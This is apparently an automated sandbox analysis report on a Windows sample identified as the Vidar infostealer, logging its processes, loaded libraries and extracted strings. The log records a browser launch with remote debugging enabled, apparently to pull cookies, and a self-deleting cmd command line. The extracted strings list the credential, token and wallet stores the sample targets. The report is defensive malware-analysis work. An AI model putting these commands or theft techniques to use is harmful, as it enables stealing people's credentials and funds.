Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F4F548 0_2_05F4F548
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F4F840 0_2_05F4F840
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F4E4B0 0_2_05F4E4B0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F30040 0_2_05F30040
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F30006 0_2_05F30006
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 0_2_05F4DF80 0_2_05F4DF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00404B3F 2_2_00404B3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00414F57 2_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00417B66 2_2_00417B66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040AF7E 2_2_0040AF7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00416FF1 2_2_00416FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004151BF 2_2_004151BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040D84A appears 139 times
Source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1441635562.0000000004EB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002971000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1424532250.00000000009CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe, 00000000.00000000.1411772955.00000000004AE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHojzy.exe, vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe Binary or memory string: OriginalFilenameHojzy.exe, vs x9Lh8czsmo.exe
Source: x9Lh8czsmo.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.x9Lh8czsmo.exe.3b52430.2.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: x9Lh8czsmo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x9Lh8czsmo.exe, RecommenderTask.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x9Lh8czsmo.exe, RecommenderTask.cs Cryptographic APIs: 'TransformFinalBlock'
Source: x9Lh8czsmo.exe, AutomatedExtractor.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: x9Lh8czsmo.exe, EditableList.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.x9Lh8czsmo.exe.5d60000.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@51/112@28/16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle, 2_2_0040F029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\GWZ5NQBG.htm Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8932:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\9ede9d47-1663-42f5-9505-d812d516d5eb.tmp Jump to behavior
Source: x9Lh8czsmo.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: x9Lh8czsmo.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: hlfctr90h.2.dr, pph4eu37q.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: x9Lh8czsmo.exe, 00000000.00000000.1411563937.00000000002C2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: update [{0}] set data = @data, revision = @next_revision where id = @id and revision = @current_revisionMdelete from [{0}] where saga_id = @id;
Source: x9Lh8czsmo.exe ReversingLabs: Detection: 52%
Source: x9Lh8czsmo.exe Virustotal: Detection: 43%
Source: x9Lh8czsmo.exe String found in binary or memory: {1})rebus-return-address
Source: unknown Process created: C:\Users\user\Desktop\x9Lh8czsmo.exe "C:\Users\user\Desktop\x9Lh8czsmo.exe"
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2240,i,16205972943544500368,14203000740554980435,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6660 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6904 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\qimg4" & exit Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2240,i,16205972943544500368,14203000740554980435,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6660 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6904 --field-trial-handle=2416,i,3783916460290687483,12681032264984015076,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: x9Lh8czsmo.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: x9Lh8czsmo.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: x9Lh8czsmo.exe Static file information: File size 2018680 > 1048576
Source: x9Lh8czsmo.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1eb000
Source: x9Lh8czsmo.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal 